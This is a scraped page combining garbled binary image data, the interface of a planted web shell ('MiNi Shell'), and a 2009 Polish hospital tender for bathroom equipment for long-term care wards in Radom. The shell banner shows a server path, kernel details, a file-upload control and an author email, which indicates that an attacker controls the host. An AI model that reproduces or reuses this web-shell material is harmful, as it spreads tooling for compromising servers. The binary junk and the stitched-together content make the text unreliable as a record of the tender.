JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/132307-N-2009.html

<p class="kh_header"><b>Radom: zakup i dostawa wyposażenia łazienek oddziałowych (wanna o regulowanej wysokości 2 szt., krzesło kąpielowe pod prysznic 2 szt., krzesło toaletowo - kąpielowe 2 szt.) dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno - Opiekuńczym, Zakładem Opiekuńczo - Leczniczym Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 132307 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa wyposażenia łazienek oddziałowych (wanna o regulowanej wysokości 2 szt., krzesło kąpielowe pod prysznic 2 szt., krzesło toaletowo - kąpielowe 2 szt.) dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno - Opiekuńczym, Zakładem Opiekuńczo - Leczniczym Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres nr 1 - wanna o regulowanej wysokości 2 szt.
L.p.	Parametry wymagane
Wersja I
1.		O regulowanej wysokości i długości całkowitej nie większej niż 2,5 m 
2.		Panel elektryczny regulujący wysokość wanny i dezynfekcji
3.		Termostat regulujący zabezpieczenie przed poparzeniem. Termometr z czytnikiem temperatury wody w wannie.
4.		Udźwig wanny nie mniej niż 380 kg
5.		Użytkowa pojemność wanny: do 300 l
6.		Poduszka i regulowany wspornik stóp umożliwiający kąpiel pacjentów o różnym wzroście 
7.		Hydromasaż do wanny. 
8.		Wąż do masażu podwodnego wyposażony w centralną dyszę.
Możliwość regulacji ciśnienia w dyszy do masażu podwodnego od 0 aż do maksymalnej wartości. Ciągła regulacja powietrza zasysanego do dyszy do masażu podwodnego
9.		Podnośnik regulowany hydraulicznie zmiany wysokości, możliwość obciążenia min. 140 kg.
10.		Długość podnośnika w pozycji leżącej min. 190 cm. Możliwość łamania leża na 3 części z regulacją kąta położenia.
11.		Pasy zabezpieczające przed upadkiem z podnośnika, w wyposażeniu min. 2 sztuki
12.		Komplet min. 2 materacy na podnośnik wykonanych z materiału nienasiąkliwego, z możliwością mycia i dezynfekcji
13.		System mycia i dezynfekcji. Oddzielny prysznic do dezynfekcji
14.		Gwarancja ogólna min. 24 miesiące
15.		Gwarancja produkcji/zabezpieczenia w części zamienne min. 10 lat
Wersja II
1.	O regulowanej wysokości, długości całkowitej nie większej niż 2,5 m, z dwiema rączkami do podtrzymywania się umieszczonymi wewnątrz wanny
2.	Panel elektryczny, regulacja za pomocą dwóch siłowników znajdujących się na dwóch końcach wanny. Panel regulujący wysokość wanny oraz z systemem termostatu i termometru.
3.	Dezynfekcja z możliwością regulacji dozowania środka, podaż oddzielnym systemem prysznicowym. Pojemnik ze środkiem bezpiecznie zamocowany w wannie.
4.	Podnośnik transportowy do przemieszczania chorych, elektrycznie sterowany
5.	Udźwig min. 160 kg możliwość obracania o 360 stopni
6.	Zakres podnoszenia min. 1200 mm, 2 akumulatory i ładowarka
7.	System awaryjnego opuszczania podnośnika
8.	Nosidło transportowe z możliwością zabezpieczenia odcinka szyjnego kręgosłupa 
9.	Gwarancja 24 miesiące
10.	Gwarancja produkcji zabezpieczenia w części zamienne min. 10 lat
11.	Dodatkowe wyposażenie w rękaw do przesuwania chorego z łóżka na wózek w pozycji leżącej, z materiału łatwoślizgowego, możliwość dezynfekcji materiału.
Zakres nr 2 - krzesło kąpielowe pod prysznic 2 szt.
L.p.	Parametry wymagane
1.		Podstawa mobilna na 4 kółkach z blokadą
2.		Uchwyt do przewożenia 
3.		Boczne barierki
4.		Minimalna waga pacjenta 120 kg
5.		Możliwość transportu pacjenta na krześle w pozycji siedzącej do łazienki
6.		Wykonany z tworzywa sztucznego dla celów medycznych, oparcie dla pleców wykonane z nienasiąkliwej tkaniny
7.		Możliwość transportu pacjenta na krześle w pozycji siedzącej do łazienki
8.		Wytrzymały i odporny na wszelkie środki dezynfekujące
9.	Gwarancja 24 miesiące
Zakres nr 3 - krzesło toaletowo - kąpielowe 2 szt.
L.p.	Parametry wymagane
Wersja I - z możliwością regulacji wysokości
1.		Wysokość krzesła  fotela regulowana elektrycznie - wyposażenie podstawowe w ładowarkę i min. 2 baterie. Udźwig min. 130 kg.
2.		Możliwość utrzymania pozycji siedzącej lub półleżącej z opcją ustawienia poduszki pod głowę zależnie od wzrostu chorego i opcją umożliwiającą wyprostowanie nóg.
3.		Poza funkcją kąpielową opcja toaletowa z basenem pod siedziskiem
4.		Boczne barierki podłokietniki, oparcie i siedzisko wykonane z materiału o lekkiej konstrukcji.
5.		Głębokość siedziska min. 37 cm
6.		Stała podstawowa rama
7.		Pojemnik sanitarny ułatwiający wylewanie zawartości oraz wyposażony w ergonomiczny uchwyt
8.		Wytrzymały i odporny na wszelkie środki dezynfekujące
9.		Możliwość wielokrotnego mycia, dezynfekcji .
10.		Gwarancja 24 miesiące
11.		Gwarancja produkcji/zabezpieczenia w części zamienne min. 10 lat
Wersja II
1.	Wysokość krzesła  fotela regulowana elektrycznie. Udźwig min. 130 kg.
2.	Możliwość ustawienia w pozycji siedzącej, półleżącej oraz uniesienia części pośladkowej chorego do góry
3.	Boczne barierki podłokietniki, oparcie i siedzisko wykonane z materiału o lekkiej konstrukcji.
4.	Głębokość siedziska min. 37 cm
5.	Wykonany z tworzywa sztucznego dla celów medycznych, oparcie dla pleców wykonane z nienamakającej tkaniny
6.	Stała podstawowa rama
7.	Pojemnik sanitarny ułatwiający wylewanie zawartości oraz wyposażony w ergonomiczny uchwyt
8.	Poza funkcją kąpielową, opcja toaletowa z basenem pod siedziskiem
9.	Wytrzymały i odporny na wszelkie środki dezynfekujące
10.	Możliwość wielokrotnego mycia, dezynfekcji .
11.	Gwarancja 24 miesiące
12.	Gwarancja produkcji zabezpieczenia w części zamienne min. 10 lat.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6, 33.19.23.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zakres nr 1  - 2.300,00 PLN 
Zakres nr 2 -    900,00 PLN 
Zakres nr 3 -      27,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne:
Wykonawca nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
Warunki szczegółowe:
Potencjał kadrowy: Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania przedmiotu zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
Doświadczenie: Wykonawca musi wykazać, że zrealizował w okresie ostatnich 3 lat kalendarzowych (przed dniem wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, min. 1 zamówienie odpowiadające swoim rodzajem i wartością oferowanemu przedmiotowi zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę .
Potencjał techniczny: Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
Potencjał finansowo-ekonomiczny: Wykonawca dysponuje własnymi środkami finansowymi zapewniającymi wykonanie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp.
2.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22, ust. 1, pkt. 1-3 ustawy Pzp. 
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, a w przypadku wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - dokument wystawiony w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości, jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4.	Informację o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Informacja musi potwierdzać spełnienie szczegółowego warunku udziału w postępowaniu. Do informacji winny być dołączone dokumenty potwierdzające, że wymienione w informacji dostawy zostały wykonane należycie.
5.	Zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że oferowane urządzenie odpowiada określonym normom lub specyfikacjom technicznym, tj. deklaracja zgodności CE wystawiona przez producenta lub certyfikat jednostki notyfikowanej uczestniczącej w procesie notyfikacji zgodnie z ustawą z dnia 20 kwietnia 2004r. o wyrobach medycznych (tekst jednolity Dz.U. z 2004r. nr 93 poz.896) lub zaświadczenie o wpisie do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.   
6.	Katalogi, foldery oferowanego towaru w języku polskim.
7.	Dokument potwierdzający wniesienie wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia
ul. Lekarska 4 pok. nr 309A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2009 godzina 12:00, miejsce: Dział Zamówień Publicznych i Zaopatrzenia
ul. Lekarska 4 pok. nr 309A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wanna o regulowanej wysokości 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Parametry wymagane
Wersja I
1.		O regulowanej wysokości i długości całkowitej nie większej niż 2,5 m 
2.		Panel elektryczny regulujący wysokość wanny i dezynfekcji
3.		Termostat regulujący zabezpieczenie przed poparzeniem. Termometr z czytnikiem temperatury wody w wannie.
4.		Udźwig wanny nie mniej niż 380 kg
5.		Użytkowa pojemność wanny: do 300 l
6.		Poduszka i regulowany wspornik stóp umożliwiający kąpiel pacjentów o różnym wzroście 
7.		Hydromasaż do wanny. 
8.		Wąż do masażu podwodnego wyposażony w centralną dyszę.
Możliwość regulacji ciśnienia w dyszy do masażu podwodnego od 0 aż do maksymalnej wartości. Ciągła regulacja powietrza zasysanego do dyszy do masażu podwodnego
9.		Podnośnik regulowany hydraulicznie zmiany wysokości, możliwość obciążenia min. 140 kg.
10.		Długość podnośnika w pozycji leżącej min. 190 cm. Możliwość łamania leża na 3 części z regulacją kąta położenia.
11.		Pasy zabezpieczające przed upadkiem z podnośnika, w wyposażeniu min. 2 sztuki
12.		Komplet min. 2 materacy na podnośnik wykonanych z materiału nienasiąkliwego, z możliwością mycia i dezynfekcji
13.		System mycia i dezynfekcji. Oddzielny prysznic do dezynfekcji
14.		Gwarancja ogólna min. 24 miesiące
15.		Gwarancja produkcji zabezpieczenia w części zamienne min. 10 lat
Wersja II
1.	O regulowanej wysokości, długości całkowitej nie większej niż 2,5 m, z dwiema rączkami do podtrzymywania się umieszczonymi wewnątrz wanny
2.	Panel elektryczny, regulacja za pomocą dwóch siłowników znajdujących się na dwóch końcach wanny. Panel regulujący wysokość wanny oraz z systemem termostatu i termometru.
3.	Dezynfekcja z możliwością regulacji dozowania środka, podaż oddzielnym systemem prysznicowym. Pojemnik ze środkiem bezpiecznie zamocowany w wannie.
4.	Podnośnik transportowy do przemieszczania chorych, elektrycznie sterowany
5.	Udźwig min. 160 kg możliwość obracania o 360 stopni
6.	Zakres podnoszenia min. 1200 mm, 2 akumulatory i ładowarka
7.	System awaryjnego opuszczania podnośnika
8.	Nosidło transportowe z możliwością zabezpieczenia odcinka szyjnego kręgosłupa 
9.	Gwarancja 24 miesiące
10.	Gwarancja produkcji zabezpieczenia w części zamienne min. 10 lat
11.	Dodatkowe wyposażenie w rękaw do przesuwania chorego z łóżka na wózek w pozycji leżącej, z materiału łatwoślizgowego, możliwość dezynfekcji materiału..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> krzesło kąpielowe pod prysznic 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Parametry wymagane
1.		Podstawa mobilna na 4 kółkach z blokadą
2.		Uchwyt do przewożenia 
3.		Boczne barierki
4.		Minimalna waga pacjenta 120 kg
5.		Możliwość transportu pacjenta na krześle w pozycji siedzącej do łazienki
6.		Wykonany z tworzywa sztucznego dla celów medycznych, oparcie dla pleców wykonane z nienasiąkliwej tkaniny
7.		Możliwość transportu pacjenta na krześle w pozycji siedzącej do łazienki
8.		Wytrzymały i odporny na wszelkie środki dezynfekujące
9.	Gwarancja 24 miesiące.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> krzesło toaletowo - kąpielowe 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Parametry wymagane
Wersja I - z możliwością regulacji wysokości
1.		Wysokość krzesła / fotela regulowana elektrycznie - wyposażenie podstawowe w ładowarkę i min. 2 baterie. Udźwig min. 130 kg.
2.		Możliwość utrzymania pozycji siedzącej lub półleżącej z opcją ustawienia poduszki pod głowę zależnie od wzrostu chorego i opcją umożliwiającą wyprostowanie nóg.
3.		Poza funkcją kąpielową opcja toaletowa z basenem pod siedziskiem
4.		Boczne barierki /podłokietniki/, oparcie i siedzisko wykonane z materiału o lekkiej konstrukcji.
5.		Głębokość siedziska min. 37 cm
6.		Stała podstawowa rama
7.		Pojemnik sanitarny ułatwiający wylewanie zawartości oraz wyposażony w ergonomiczny uchwyt
8.		Wytrzymały i odporny na wszelkie środki dezynfekujące
9.		Możliwość wielokrotnego mycia, dezynfekcji .
10.		Gwarancja 24 miesiące
11.		Gwarancja produkcji/zabezpieczenia w części zamienne min. 10 lat
Wersja II
1.	Wysokość krzesła / fotela regulowana elektrycznie. Udźwig min. 130 kg.
2.	Możliwość ustawienia w pozycji siedzącej, półleżącej oraz uniesienia części pośladkowej chorego do góry
3.	Boczne barierki /podłokietniki/, oparcie i siedzisko wykonane z materiału o lekkiej konstrukcji.
4.	Głębokość siedziska min. 37 cm
5.	Wykonany z tworzywa sztucznego dla celów medycznych, oparcie dla pleców wykonane z nienamakającej tkaniny
6.	Stała podstawowa rama
7.	Pojemnik sanitarny ułatwiający wylewanie zawartości oraz wyposażony w ergonomiczny uchwyt
8.	Poza funkcją kąpielową, opcja toaletowa z basenem pod siedziskiem
9.	Wytrzymały i odporny na wszelkie środki dezynfekujące
10.	Możliwość wielokrotnego mycia, dezynfekcji .
11.	Gwarancja 24 miesiące
12.	Gwarancja produkcji/zabezpieczenia w części zamienne min. 10 lat.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com